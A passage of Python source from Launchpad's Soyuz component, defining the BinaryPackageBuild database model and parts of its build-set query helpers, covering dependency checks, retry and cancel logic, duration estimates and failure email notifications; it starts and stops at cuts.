simple_sendmail,\n )\nfrom lp.services.webapp import canonical_url\nfrom lp.soyuz.enums import ArchivePurpose\nfrom lp.soyuz.interfaces.binarypackagebuild import (\n BuildSetStatus,\n CannotBeRescored,\n IBinaryPackageBuild,\n IBinaryPackageBuildSet,\n UnparsableDependencies,\n )\nfrom lp.soyuz.interfaces.distroarchseries import 
IDistroArchSeries\nfrom lp.soyuz.model.binarypackagename import BinaryPackageName\nfrom lp.soyuz.model.binarypackagerelease import BinaryPackageRelease\nfrom lp.soyuz.model.buildpackagejob import BuildPackageJob\nfrom lp.soyuz.model.files import BinaryPackageFile\nfrom lp.soyuz.model.queue import (\n PackageUpload,\n PackageUploadBuild,\n )\n\n\nclass BinaryPackageBuild(PackageBuildMixin, SQLBase):\n implements(IBinaryPackageBuild)\n _table = 'BinaryPackageBuild'\n _defaultOrder = 'id'\n\n job_type = BuildFarmJobType.PACKAGEBUILD\n\n build_farm_job_id = Int(name='build_farm_job')\n build_farm_job = Reference(build_farm_job_id, BuildFarmJob.id)\n\n distro_arch_series_id = Int(name='distro_arch_series', allow_none=False)\n distro_arch_series = Reference(\n distro_arch_series_id, 'DistroArchSeries.id')\n source_package_release_id = Int(\n name='source_package_release', allow_none=False)\n source_package_release = Reference(\n source_package_release_id, 'SourcePackageRelease.id')\n\n archive_id = Int(name='archive', allow_none=False)\n archive = Reference(archive_id, 'Archive.id')\n\n pocket = DBEnum(\n name='pocket', enum=PackagePublishingPocket, allow_none=False)\n\n upload_log_id = Int(name='upload_log')\n upload_log = Reference(upload_log_id, 'LibraryFileAlias.id')\n\n dependencies = Unicode(name='dependencies')\n\n processor_id = Int(name='processor')\n processor = Reference(processor_id, 'Processor.id')\n virtualized = Bool(name='virtualized')\n\n date_created = DateTime(\n name='date_created', tzinfo=pytz.UTC, allow_none=False)\n date_started = DateTime(name='date_started', tzinfo=pytz.UTC)\n date_finished = DateTime(name='date_finished', tzinfo=pytz.UTC)\n date_first_dispatched = DateTime(\n name='date_first_dispatched', tzinfo=pytz.UTC)\n\n builder_id = Int(name='builder')\n builder = Reference(builder_id, 'Builder.id')\n\n status = DBEnum(name='status', enum=BuildStatus, allow_none=False)\n\n log_id = Int(name='log')\n log = Reference(log_id, 'LibraryFileAlias.id')\n\n failure_count = Int(name='failure_count', allow_none=False)\n\n distribution_id = Int(name='distribution', allow_none=False)\n distribution = Reference(distribution_id, 'Distribution.id')\n\n distro_series_id = Int(name='distro_series', allow_none=False)\n distro_series = Reference(distro_series_id, 'DistroSeries.id')\n\n is_distro_archive = Bool(name='is_distro_archive', allow_none=False)\n\n source_package_name_id = Int(name='source_package_name', allow_none=False)\n source_package_name = Reference(\n source_package_name_id, 'SourcePackageName.id')\n\n @property\n def buildqueue_record(self):\n \"\"\"See `IBuild`.\"\"\"\n store = Store.of(self)\n results = store.find(\n BuildQueue,\n BuildPackageJob.job == BuildQueue.jobID,\n BuildPackageJob.build == self.id)\n return results.one()\n\n def _getLatestPublication(self):\n from lp.soyuz.model.publishing import SourcePackagePublishingHistory\n store = Store.of(self)\n results = store.find(\n SourcePackagePublishingHistory,\n SourcePackagePublishingHistory.archive == self.archive,\n SourcePackagePublishingHistory.distroseries == self.distro_series,\n SourcePackagePublishingHistory.sourcepackagerelease ==\n self.source_package_release)\n return results.order_by(\n Desc(SourcePackagePublishingHistory.id)).first()\n\n @property\n def current_component(self):\n \"\"\"See `IBuild`.\"\"\"\n latest_publication = self._getLatestPublication()\n # Production has some buggy builds without source publications.\n # They seem to have been created by early versions of gina and\n # the 
readding of hppa.\n if latest_publication is not None:\n return latest_publication.component\n\n @property\n def current_source_publication(self):\n \"\"\"See `IBuild`.\"\"\"\n from lp.soyuz.interfaces.publishing import active_publishing_status\n latest_publication = self._getLatestPublication()\n if (latest_publication is not None and\n latest_publication.status in active_publishing_status):\n return latest_publication\n return None\n\n @property\n def upload_changesfile(self):\n \"\"\"See `IBuild`\"\"\"\n package_upload = self.package_upload\n if package_upload is None:\n return None\n return package_upload.changesfile\n\n @property\n def changesfile_url(self):\n \"\"\"See `IBinaryPackageBuild`.\"\"\"\n changesfile = self.upload_changesfile\n if changesfile is None:\n return None\n return ProxiedLibraryFileAlias(changesfile, self).http_url\n\n @property\n def package_upload(self):\n \"\"\"See `IBuild`.\"\"\"\n store = Store.of(self)\n # The join on 'changesfile' is used for pre-fetching the\n # corresponding library file, so callsites don't have to issue an\n # extra query.\n origin = [\n PackageUploadBuild,\n Join(PackageUpload,\n PackageUploadBuild.packageuploadID == PackageUpload.id),\n Join(LibraryFileAlias,\n LibraryFileAlias.id == PackageUpload.changes_file_id),\n Join(LibraryFileContent,\n LibraryFileContent.id == LibraryFileAlias.contentID),\n ]\n results = store.using(*origin).find(\n (PackageUpload, LibraryFileAlias, LibraryFileContent),\n PackageUploadBuild.build == self,\n PackageUpload.archive == self.archive,\n PackageUpload.distroseries == self.distro_series)\n\n # Return the unique `PackageUpload` record that corresponds to the\n # upload of the result of this `Build`, load the `LibraryFileAlias`\n # and the `LibraryFileContent` in cache because it's most likely\n # they will be needed.\n return DecoratedResultSet(results, itemgetter(0)).one()\n\n @property\n def is_virtualized(self):\n \"\"\"See `IBuild`\"\"\"\n return self.archive.require_virtualized\n\n @property\n def title(self):\n \"\"\"See `IBuild`\"\"\"\n return '%s build of %s %s in %s %s %s' % (\n self.distro_arch_series.architecturetag,\n self.source_package_release.name,\n self.source_package_release.version,\n self.distribution.name, self.distro_series.name, self.pocket.name)\n\n @property\n def was_built(self):\n \"\"\"See `IBuild`\"\"\"\n return self.status not in [BuildStatus.NEEDSBUILD,\n BuildStatus.BUILDING,\n BuildStatus.UPLOADING,\n BuildStatus.SUPERSEDED]\n\n @property\n def arch_tag(self):\n \"\"\"See `IBuild`.\"\"\"\n return self.distro_arch_series.architecturetag\n\n @property\n def log_url(self):\n \"\"\"See `IPackageBuild`.\n\n Overridden here for the case of builds for distro archives,\n currently only supported for binary package builds.\n \"\"\"\n if self.log is None:\n return None\n return ProxiedLibraryFileAlias(self.log, self).http_url\n\n @property\n def upload_log_url(self):\n \"\"\"See `IPackageBuild`.\n\n Overridden here for the case of builds for distro archives,\n currently only supported for binary package builds.\n \"\"\"\n if self.upload_log is None:\n return None\n return ProxiedLibraryFileAlias(self.upload_log, self).http_url\n\n @property\n def distributionsourcepackagerelease(self):\n \"\"\"See `IBuild`.\"\"\"\n from lp.soyuz.model.distributionsourcepackagerelease \\\n import (\n DistributionSourcePackageRelease)\n\n return DistributionSourcePackageRelease(\n distribution=self.distribution,\n sourcepackagerelease=self.source_package_release)\n\n def 
getBinaryPackageNamesForDisplay(self):\n \"\"\"See `IBuildView`.\"\"\"\n store = Store.of(self)\n result = store.find(\n (BinaryPackageRelease, BinaryPackageName),\n BinaryPackageRelease.build == self,\n BinaryPackageRelease.binarypackagename == BinaryPackageName.id,\n BinaryPackageName.id == BinaryPackageRelease.binarypackagenameID)\n return result.order_by(\n [BinaryPackageName.name, BinaryPackageRelease.id])\n\n def getBinaryFilesForDisplay(self):\n \"\"\"See `IBuildView`.\"\"\"\n store = Store.of(self)\n result = store.find(\n (BinaryPackageRelease, BinaryPackageFile, LibraryFileAlias,\n LibraryFileContent),\n BinaryPackageRelease.build == self,\n BinaryPackageRelease.id ==\n BinaryPackageFile.binarypackagereleaseID,\n LibraryFileAlias.id == BinaryPackageFile.libraryfileID,\n LibraryFileContent.id == LibraryFileAlias.contentID)\n return result.order_by(\n [LibraryFileAlias.filename, BinaryPackageRelease.id]).config(\n distinct=True)\n\n @property\n def binarypackages(self):\n \"\"\"See `IBuild`.\"\"\"\n return BinaryPackageRelease.select(\"\"\"\n BinaryPackageRelease.build = %s AND\n BinaryPackageRelease.binarypackagename = BinaryPackageName.id\n \"\"\" % sqlvalues(self),\n clauseTables=[\"BinaryPackageName\"],\n orderBy=[\"BinaryPackageName.name\", \"BinaryPackageRelease.id\"],\n prejoins=[\"binarypackagename\", \"component\", \"section\"])\n\n @property\n def distroarchseriesbinarypackages(self):\n \"\"\"See `IBuild`.\"\"\"\n # Avoid circular import by importing locally.\n from lp.soyuz.model.distroarchseriesbinarypackagerelease import (\n DistroArchSeriesBinaryPackageRelease)\n return [DistroArchSeriesBinaryPackageRelease(\n self.distro_arch_series, bp)\n for bp in self.binarypackages]\n\n @property\n def can_be_retried(self):\n \"\"\"See `IBuild`.\"\"\"\n # First check that the slave scanner would pick up the build record\n # if we reset it.\n if not self.archive.canModifySuite(self.distro_series, self.pocket):\n # The slave scanner would not pick this up, so it cannot be\n # re-tried.\n return False\n\n failed_statuses = [\n BuildStatus.FAILEDTOBUILD,\n BuildStatus.MANUALDEPWAIT,\n BuildStatus.CHROOTWAIT,\n BuildStatus.FAILEDTOUPLOAD,\n BuildStatus.CANCELLED,\n ]\n\n # If the build is currently in any of the failed states,\n # it may be retried.\n return self.status in failed_statuses\n\n @property\n def can_be_rescored(self):\n \"\"\"See `IBuild`.\"\"\"\n return self.status is BuildStatus.NEEDSBUILD\n\n @property\n def can_be_cancelled(self):\n \"\"\"See `IBuild`.\"\"\"\n if not self.buildqueue_record:\n return False\n\n cancellable_statuses = [\n BuildStatus.BUILDING,\n BuildStatus.NEEDSBUILD,\n ]\n return self.status in cancellable_statuses\n\n def retry(self):\n \"\"\"See `IBuild`.\"\"\"\n assert self.can_be_retried, \"Build %s cannot be retried\" % self.id\n self.build_farm_job.status = self.status = BuildStatus.NEEDSBUILD\n self.build_farm_job.date_finished = self.date_finished = None\n self.date_started = None\n self.build_farm_job.builder = self.builder = None\n self.log = None\n self.upload_log = None\n self.dependencies = None\n self.failure_count = 0\n self.queueBuild()\n\n def rescore(self, score):\n \"\"\"See `IBuild`.\"\"\"\n if not self.can_be_rescored:\n raise CannotBeRescored(\"Build cannot be rescored.\")\n\n self.buildqueue_record.manualScore(score)\n\n @property\n def api_score(self):\n \"\"\"See `IBinaryPackageBuild`.\"\"\"\n # Score of the related buildqueue record (if any)\n if self.buildqueue_record is None:\n return None\n else:\n return 
self.buildqueue_record.lastscore\n\n def cancel(self):\n \"\"\"See `IBinaryPackageBuild`.\"\"\"\n if not self.can_be_cancelled:\n return\n\n # If the build is currently building we need to tell the\n # buildd-manager to terminate it.\n if self.status == BuildStatus.BUILDING:\n self.updateStatus(BuildStatus.CANCELLING)\n return\n\n # Otherwise we can cancel it here.\n self.buildqueue_record.cancel()\n\n def makeJob(self):\n \"\"\"See `IBuildFarmJob`.\"\"\"\n store = Store.of(self)\n job = Job()\n store.add(job)\n specific_job = BuildPackageJob(build=self, job=job)\n store.add(specific_job)\n return specific_job\n\n def _parseDependencyToken(self, token):\n \"\"\"Parse the given token.\n\n Raises AssertionError if the given token couldn't be parsed.\n\n Return a triple containing the corresponding (name, version,\n relation) for the given dependency token.\n \"\"\"\n # XXX cprov 2006-02-27: it may not work for and'd and or'd syntax.\n try:\n name, version, relation = token[0]\n except ValueError:\n raise AssertionError(\n \"APT is not dealing correctly with a dependency token \"\n \"'%r' from %s (%s) with the following dependencies: %s\\n\"\n \"It is expected to be a tuple containing only another \"\n \"tuple with 3 elements (name, version, relation).\"\n % (token, self.title, self.id, self.dependencies))\n # Map relations to the canonical form used in control files.\n if relation == '<':\n relation = '<<'\n elif relation == '>':\n relation = '>>'\n return (name, version, relation)\n\n def _checkDependencyVersion(self, available, required, relation):\n \"\"\"Return True if the available version satisfies the context.\"\"\"\n # This dict maps the package version relationship syntax in lambda\n # functions which returns boolean according to the results of\n # apt_pkg.version_compare function (see the order above).\n # For further information about pkg relationship syntax see:\n #\n # http://www.debian.org/doc/debian-policy/ch-relationships.html\n #\n version_relation_map = {\n # any version is acceptable if no relationship is given\n '': lambda x: True,\n # strictly later\n '>>': lambda x: x == 1,\n # later or equal\n '>=': lambda x: x >= 0,\n # strictly equal\n '=': lambda x: x == 0,\n # earlier or equal\n '<=': lambda x: x <= 0,\n # strictly earlier\n '<<': lambda x: x == -1,\n }\n\n # Use apt_pkg function to compare versions\n # it behaves similar to cmp, i.e. returns negative\n # if first < second, zero if first == second and\n # positive if first > second.\n dep_result = apt_pkg.version_compare(available, required)\n\n return version_relation_map[relation](dep_result)\n\n def _isDependencySatisfied(self, token):\n \"\"\"Check if the given dependency token is satisfied.\n\n Check if the dependency exists and that its version constraint is\n satisfied.\n \"\"\"\n name, version, relation = self._parseDependencyToken(token)\n\n # There may be several published versions in the available\n # archives and pockets. 
If any one of them satisfies our\n # constraints, the dependency is satisfied.\n dep_candidates = self.archive.findDepCandidates(\n self.distro_arch_series, self.pocket, self.current_component,\n self.source_package_release.sourcepackagename.name, name)\n\n for dep_candidate in dep_candidates:\n if self._checkDependencyVersion(\n dep_candidate.binarypackagerelease.version, version,\n relation):\n return True\n\n return False\n\n def _toAptFormat(self, token):\n \"\"\"Rebuild dependencies line in apt format.\"\"\"\n name, version, relation = self._parseDependencyToken(token)\n if relation and version:\n return '%s (%s %s)' % (name, relation, version)\n return '%s' % name\n\n def updateDependencies(self):\n \"\"\"See `IBuild`.\"\"\"\n\n # apt_pkg requires init_system to get version_compare working\n # properly.\n apt_pkg.init_system()\n\n # Check package build dependencies using apt_pkg\n try:\n parsed_deps = apt_pkg.parse_depends(self.dependencies)\n except (ValueError, TypeError):\n raise UnparsableDependencies(\n \"Build dependencies for %s (%s) could not be parsed: '%s'\\n\"\n \"It indicates that something is wrong in buildd-slaves.\"\n % (self.title, self.id, self.dependencies))\n\n remaining_deps = [\n self._toAptFormat(token) for token in parsed_deps\n if not self._isDependencySatisfied(token)]\n\n # Update dependencies line\n self.dependencies = u\", \".join(remaining_deps)\n\n def __getitem__(self, name):\n return self.getBinaryPackageRelease(name)\n\n def getBinaryPackageRelease(self, name):\n \"\"\"See `IBuild`.\"\"\"\n for binpkg in self.binarypackages:\n if binpkg.name == name:\n return binpkg\n raise NotFoundError('No binary package \"%s\" in build' % name)\n\n def createBinaryPackageRelease(\n self, binarypackagename, version, summary, description,\n binpackageformat, component, section, priority, installedsize,\n architecturespecific, shlibdeps=None, depends=None, recommends=None,\n suggests=None, conflicts=None, replaces=None, provides=None,\n pre_depends=None, enhances=None, breaks=None, essential=False,\n debug_package=None, user_defined_fields=None, homepage=None):\n \"\"\"See IBuild.\"\"\"\n return BinaryPackageRelease(\n build=self, binarypackagename=binarypackagename, version=version,\n summary=summary, description=description,\n binpackageformat=binpackageformat,\n component=component, section=section, priority=priority,\n shlibdeps=shlibdeps, depends=depends, recommends=recommends,\n suggests=suggests, conflicts=conflicts, replaces=replaces,\n provides=provides, pre_depends=pre_depends, enhances=enhances,\n breaks=breaks, essential=essential, installedsize=installedsize,\n architecturespecific=architecturespecific,\n debug_package=debug_package,\n user_defined_fields=user_defined_fields, homepage=homepage)\n\n def estimateDuration(self):\n \"\"\"See `IPackageBuild`.\"\"\"\n # Always include the primary archive when looking for\n # past build times (just in case that none can be found\n # in a PPA or copy archive).\n archives = [self.archive.id]\n if self.archive.purpose != ArchivePurpose.PRIMARY:\n archives.append(self.distro_arch_series.main_archive.id)\n\n # Look for all sourcepackagerelease instances that match the name\n # and get the (successfully built) build records for this\n # package.\n completed_builds = Store.of(self).find(\n BinaryPackageBuild,\n BinaryPackageBuild.archive_id.is_in(archives),\n BinaryPackageBuild.distro_arch_series == self.distro_arch_series,\n BinaryPackageBuild.source_package_name == self.source_package_name,\n 
BinaryPackageBuild.date_finished != None,\n BinaryPackageBuild.status == BuildStatus.FULLYBUILT,\n BinaryPackageBuild.id != self.id)\n most_recent_build = completed_builds.order_by(\n Desc(BinaryPackageBuild.date_finished),\n Desc(BinaryPackageBuild.id)).first()\n if most_recent_build is not None and most_recent_build.duration:\n # Historic build data exists, use the most recent value -\n # assuming it has valid data.\n return most_recent_build.duration\n\n # Estimate the build duration based on package size if no\n # historic build data exists.\n # Get the package size in KB.\n package_size = self.source_package_release.getPackageSize()\n if package_size > 0:\n # Analysis of previous build data shows that a build rate\n # of 6 KB/second is realistic. Furthermore we have to add\n # another minute for generic build overhead.\n estimate = int(package_size / 6.0 / 60 + 1)\n else:\n # No historic build times and no package size available,\n # assume a build time of 5 minutes.\n estimate = 5\n return datetime.timedelta(minutes=estimate)\n\n def verifySuccessfulUpload(self):\n return bool(self.binarypackages)\n\n def notify(self, extra_info=None):\n \"\"\"See `IPackageBuild`.\n\n If config.buildmaster.build_notification is disable, simply\n return.\n\n If config.builddmaster.notify_owner is enabled and SPR.creator\n has preferredemail it will send an email to the creator, Bcc:\n to the config.builddmaster.default_recipient. If one of the\n conditions was not satisfied, no preferredemail found (autosync\n or untouched packages from debian) or config options disabled,\n it will only send email to the specified default recipient.\n\n This notification will contain useful information about\n the record in question (all states are supported), see\n doc/build-notification.txt for further information.\n \"\"\"\n\n if not config.builddmaster.send_build_notification:\n return\n if self.status == BuildStatus.FULLYBUILT:\n return\n\n recipients = set()\n\n fromaddress = format_address(\n config.builddmaster.default_sender_name,\n config.builddmaster.default_sender_address)\n\n extra_headers = {\n 'X-Launchpad-Build-State': self.status.name,\n 'X-Launchpad-Build-Component': self.current_component.name,\n 'X-Launchpad-Build-Arch':\n self.distro_arch_series.architecturetag,\n }\n\n # XXX cprov 2006-10-27: Temporary extra debug info about the\n # SPR.creator in context, to be used during the service quarantine,\n # notify_owner will be disabled to avoid *spamming* Debian people.\n creator = self.source_package_release.creator\n extra_headers['X-Creator-Recipient'] = \",\".join(\n get_contact_email_addresses(creator))\n\n # Currently there are 7038 SPR published in edgy which the creators\n # have no preferredemail. They are the autosync ones (creator = katie,\n # 3583 packages) and the untouched sources since we have migrated from\n # DAK (the rest). 
We should not spam Debian maintainers.\n\n # Please note that both the package creator and the package uploader\n # will be notified of failures if:\n # * the 'notify_owner' flag is set\n # * the package build (failure) occurred in the original\n # archive.\n package_was_not_copied = (\n self.archive == self.source_package_release.upload_archive)\n\n if package_was_not_copied and config.builddmaster.notify_owner:\n if (self.archive.is_ppa and creator.inTeam(self.archive.owner)\n or\n not self.archive.is_ppa):\n # If this is a PPA, the package creator should only be\n # notified if they are the PPA owner or in the PPA team.\n # (see bug 375757)\n # Non-PPA notifications inform the creator regardless.\n recipients = recipients.union(\n get_contact_email_addresses(creator))\n dsc_key = self.source_package_release.dscsigningkey\n if dsc_key:\n recipients = recipients.union(\n get_contact_email_addresses(dsc_key.owner))\n\n # Modify notification contents according to the targeted archive.\n # 'Archive Tag', 'Subject' and 'Source URL' are customized for PPA.\n # We only send build-notifications to 'buildd-admin' celebrity for\n # main archive candidates.\n # For PPA build notifications we include the archive.owner\n # contact_address.\n if not self.archive.is_ppa:\n buildd_admins = getUtility(ILaunchpadCelebrities).buildd_admin\n recipients = recipients.union(\n get_contact_email_addresses(buildd_admins))\n archive_tag = '%s primary archive' % self.distribution.name\n subject = \"[Build #%d] %s\" % (self.id, self.title)\n source_url = canonical_url(self.distributionsourcepackagerelease)\n else:\n recipients = recipients.union(\n get_contact_email_addresses(self.archive.owner))\n # For PPAs we run the risk of having no available contact_address,\n # for instance, when both, SPR.creator and Archive.owner have\n # not enabled it.\n if len(recipients) == 0:\n return\n archive_tag = '%s PPA' % get_ppa_reference(self.archive)\n subject = \"[Build #%d] %s (%s)\" % (\n self.id, self.title, archive_tag)\n source_url = 'not available'\n extra_headers['X-Launchpad-PPA'] = get_ppa_reference(self.archive)\n\n # XXX cprov 2006-08-02: pending security recipients for SECURITY\n # pocket build. 
We don't build SECURITY yet :(\n\n # XXX cprov 2006-08-02: find out a way to glue parameters reported\n # with the state in the build worflow, maybe by having an\n # IBuild.statusReport property, which could also be used in the\n # respective page template.\n if self.status in [\n BuildStatus.NEEDSBUILD, BuildStatus.SUPERSEDED]:\n # untouched builds\n buildduration = 'not available'\n buildlog_url = 'not available'\n builder_url = 'not available'\n elif self.status == BuildStatus.UPLOADING:\n buildduration = 'uploading'\n buildlog_url = 'see builder page'\n builder_url = 'not available'\n elif self.status == BuildStatus.BUILDING:\n # build in process\n buildduration = 'not finished'\n buildlog_url = 'see builder page'\n builder_url = canonical_url(self.buildqueue_record.builder)\n else:\n # completed states (success and failure)\n buildduration = DurationFormatterAPI(\n self.duration).approximateduration()\n buildlog_url = self.log_url\n builder_url = canonical_url(self.builder)\n\n if self.status == BuildStatus.FAILEDTOUPLOAD:\n assert extra_info is not None, (\n 'Extra information is required for FAILEDTOUPLOAD '\n 'notifications.')\n extra_info = 'Upload log:\\n%s' % extra_info\n else:\n extra_info = ''\n\n template = get_email_template('build-notification.txt', app='soyuz')\n replacements = {\n 'source_name': self.source_package_release.name,\n 'source_version': self.source_package_release.version,\n 'architecturetag': self.distro_arch_series.architecturetag,\n 'build_state': self.status.title,\n 'build_duration': buildduration,\n 'buildlog_url': buildlog_url,\n 'builder_url': builder_url,\n 'build_title': self.title,\n 'build_url': canonical_url(self),\n 'source_url': source_url,\n 'extra_info': extra_info,\n 'archive_tag': archive_tag,\n 'component_tag': self.current_component.name,\n }\n message = template % replacements\n\n for toaddress in recipients:\n simple_sendmail(\n fromaddress, toaddress, subject, message,\n headers=extra_headers)\n\n def _getDebByFileName(self, filename):\n \"\"\"Helper function to get a .deb LFA in the context of this build.\"\"\"\n bpf = self.getBinaryPackageFileByName(filename)\n if bpf is not None:\n return bpf.libraryfile\n else:\n return None\n\n def getFileByName(self, filename):\n \"\"\"See `IBuild`.\"\"\"\n if filename.endswith('.changes'):\n file_object = self.upload_changesfile\n elif filename.endswith('.txt.gz'):\n file_object = self.log\n elif filename.endswith('_log.txt'):\n file_object = self.upload_log\n elif filename.endswith('deb'):\n file_object = self._getDebByFileName(filename)\n else:\n raise NotFoundError(filename)\n\n if file_object is not None and file_object.filename == filename:\n return file_object\n\n raise NotFoundError(filename)\n\n def getBinaryPackageFileByName(self, filename):\n \"\"\"See `IBuild`.\"\"\"\n return Store.of(self).find(\n BinaryPackageFile,\n BinaryPackageRelease.build == self.id,\n BinaryPackageFile.binarypackagerelease == BinaryPackageRelease.id,\n LibraryFileAlias.id == BinaryPackageFile.libraryfileID,\n LibraryFileAlias.filename == filename).one()\n\n def getUploader(self, changes):\n \"\"\"See `IBinaryPackageBuild`.\"\"\"\n return changes.signer\n\n\nclass BinaryPackageBuildSet:\n implements(IBinaryPackageBuildSet)\n\n def new(self, distro_arch_series, source_package_release, processor,\n archive, pocket, status=BuildStatus.NEEDSBUILD,\n date_created=None, builder=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n # Create the BuildFarmJob for the new BinaryPackageBuild.\n build_farm_job = 
getUtility(IBuildFarmJobSource).new(\n BinaryPackageBuild.job_type, status, date_created, builder,\n archive)\n binary_package_build = BinaryPackageBuild(\n build_farm_job=build_farm_job,\n distro_arch_series=distro_arch_series,\n source_package_release=source_package_release,\n archive=archive, pocket=pocket, status=status, processor=processor,\n virtualized=archive.require_virtualized, builder=builder,\n is_distro_archive=archive.is_main,\n distribution=distro_arch_series.distroseries.distribution,\n distro_series=distro_arch_series.distroseries,\n source_package_name=source_package_release.sourcepackagename)\n if date_created is not None:\n binary_package_build.date_created = date_created\n return binary_package_build\n\n def getByID(self, id):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n try:\n return BinaryPackageBuild.get(id)\n except SQLObjectNotFound as e:\n raise NotFoundError(str(e))\n\n def getByBuildFarmJob(self, build_farm_job):\n \"\"\"See `ISpecificBuildFarmJobSource`.\"\"\"\n return Store.of(build_farm_job).find(\n BinaryPackageBuild, build_farm_job_id=build_farm_job.id).one()\n\n def preloadBuildsData(self, builds):\n # Circular imports.\n from lp.soyuz.model.distroarchseries import DistroArchSeries\n from lp.registry.model.distroseries import DistroSeries\n from lp.registry.model.distribution import Distribution\n from lp.soyuz.model.archive import Archive\n from lp.registry.model.person import Person\n self._prefetchBuildData(builds)\n das = load_related(DistroArchSeries, builds, ['distro_arch_series_id'])\n archives = load_related(Archive, builds, ['archive_id'])\n load_related(Person, archives, ['ownerID'])\n distroseries = load_related(DistroSeries, das, ['distroseriesID'])\n load_related(Distribution, distroseries, ['distributionID'])\n\n def getByBuildFarmJobs(self, build_farm_jobs):\n \"\"\"See `ISpecificBuildFarmJobSource`.\"\"\"\n if len(build_farm_jobs) == 0:\n return EmptyResultSet()\n rows = Store.of(build_farm_jobs[0]).find(\n BinaryPackageBuild,\n BinaryPackageBuild.build_farm_job_id.is_in(\n bfj.id for bfj in build_farm_jobs))\n return DecoratedResultSet(rows, pre_iter_hook=self.preloadBuildsData)\n\n def handleOptionalParamsForBuildQueries(\n self, clauses, origin, status=None, name=None, pocket=None,\n arch_tag=None):\n \"\"\"Construct query clauses needed/shared by all getBuild..() methods.\n\n This method is not exposed via the public interface as it is only\n used to DRY-up trusted code.\n\n :param clauses: container to which to add any resulting query clauses.\n :param origin: container to which to add joined tables.\n :param status: optional build state for which to add a query clause if\n present.\n :param name: optional source package release name (or list of source\n package release names) for which to add a query clause if\n present.\n :param pocket: optional pocket (or list of pockets) for which to add a\n query clause if present.\n :param arch_tag: optional architecture tag for which to add a\n query clause if present.\n \"\"\"\n # Circular. 
:(\n from lp.soyuz.model.distroarchseries import DistroArchSeries\n\n origin.append(BinaryPackageBuild)\n\n # Add query clause that filters on build state if the latter is\n # provided.\n if status is not None:\n clauses.append(BinaryPackageBuild.status == status)\n\n # Add query clause that filters on pocket if the latter is provided.\n if pocket:\n if not isinstance(pocket, (list, tuple)):\n pocket = (pocket,)\n clauses.append(BinaryPackageBuild.pocket.is_in(pocket))\n\n # Add query clause that filters on architecture tag if provided.\n if arch_tag is not None:\n clauses.append(\n BinaryPackageBuild.distro_arch_series_id ==\n DistroArchSeries.id)\n if not isinstance(arch_tag, (list, tuple)):\n arch_tag = (arch_tag,)\n clauses.append(DistroArchSeries.architecturetag.is_in(arch_tag))\n origin.append(DistroArchSeries)\n\n # Add query clause that filters on source package release name if the\n # latter is provided.\n if name is not None:\n clauses.append(\n BinaryPackageBuild.source_package_name_id ==\n SourcePackageName.id)\n origin.extend([SourcePackageName])\n if not isinstance(name, (list, tuple)):\n clauses.append(\n SourcePackageName.name.contains_string(name))\n else:\n clauses.append(SourcePackageName.name.is_in(name))\n\n def getBuildsForBuilder(self, builder_id, status=None, name=None,\n arch_tag=None, user=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n # Circular. :(\n from lp.soyuz.model.archive import (\n Archive, get_archive_privacy_filter)\n\n clauses = [\n BinaryPackageBuild.archive_id == Archive.id,\n BinaryPackageBuild.builder_id == builder_id,\n get_archive_privacy_filter(user)]\n origin = [Archive]\n\n self.handleOptionalParamsForBuildQueries(\n clauses, origin, status, name, pocket=None, arch_tag=arch_tag)\n\n return IStore(BinaryPackageBuild).using(*origin).find(\n BinaryPackageBuild, *clauses).order_by(\n Desc(BinaryPackageBuild.date_finished),\n BinaryPackageBuild.id)\n\n def getBuildsForArchive(self, archive, status=None, name=None,\n pocket=None, arch_tag=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n clauses = [BinaryPackageBuild.archive_id == archive.id]\n origin = []\n\n self.handleOptionalParamsForBuildQueries(\n clauses, origin, status, name, pocket, arch_tag)\n\n # Ordering according status\n # * SUPERSEDED & All by -datecreated\n # * FULLYBUILT & FAILURES by -datebuilt\n # It should present the builds in a more natural order.\n if status == BuildStatus.SUPERSEDED or status is None:\n orderBy = [Desc(BinaryPackageBuild.date_created)]\n else:\n orderBy = [Desc(BinaryPackageBuild.date_finished)]\n # All orders fallback to id if the primary order doesn't succeed\n orderBy.append(BinaryPackageBuild.id)\n\n return self._decorate_with_prejoins(\n IStore(BinaryPackageBuild).using(*origin).find(\n BinaryPackageBuild, *clauses).order_by(*orderBy))\n\n def getBuildsForDistro(self, context, status=None, name=None,\n pocket=None, arch_tag=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n if IDistribution.providedBy(context):\n col = BinaryPackageBuild.distribution_id\n elif IDistroSeries.providedBy(context):\n col = BinaryPackageBuild.distro_series_id\n elif IDistroArchSeries.providedBy(context):\n col = BinaryPackageBuild.distro_arch_series_id\n else:\n raise AssertionError(\"Unsupported context: %r\" % context)\n condition_clauses = [\n col == context.id, BinaryPackageBuild.is_distro_archive]\n\n # XXX cprov 2006-09-25: It would be nice if we could encapsulate\n # the chunk of code below (which deals with the optional paramenters)\n # and share it with 
ISourcePackage.getBuildRecords()\n\n # exclude gina-generated and security (dak-made) builds\n # status == FULLYBUILT && datebuilt == null\n if status == BuildStatus.FULLYBUILT:\n condition_clauses.append(BinaryPackageBuild.date_finished != None)\n else:\n condition_clauses.append(Or(\n BinaryPackageBuild.status != BuildStatus.FULLYBUILT,\n BinaryPackageBuild.date_finished != None))\n\n # Ordering according status\n # * NEEDSBUILD, BUILDING & UPLOADING by -lastscore\n # * SUPERSEDED & All by -BinaryPackageBuild.id\n # (nearly equivalent to -datecreated, but much more\n # efficient.)\n # * FULLYBUILT & FAILURES by -datebuilt\n # It should present the builds in a more natural order.\n clauseTables = []\n order_by_table = None\n if status in [\n BuildStatus.NEEDSBUILD,\n BuildStatus.BUILDING,\n BuildStatus.UPLOADING]:\n order_by = [Desc(BuildQueue.lastscore), BinaryPackageBuild.id]\n order_by_table = BuildQueue\n clauseTables.extend([BuildQueue, BuildPackageJob])\n condition_clauses.extend([\n BuildPackageJob.build_id == BinaryPackageBuild.id,\n BuildPackageJob.job_id == BuildQueue.jobID])\n elif status == BuildStatus.SUPERSEDED or status is None:\n order_by = [Desc(BinaryPackageBuild.id)]\n else:\n order_by = [Desc(BinaryPackageBuild.date_finished),\n BinaryPackageBuild.id]\n\n # End of duplication (see XXX cprov 2006-09-25 above).\n\n self.handleOptionalParamsForBuildQueries(\n condition_clauses, clauseTables, status, name, pocket, arch_tag)\n\n find_spec = (BinaryPackageBuild,)\n if order_by_table:\n find_spec = 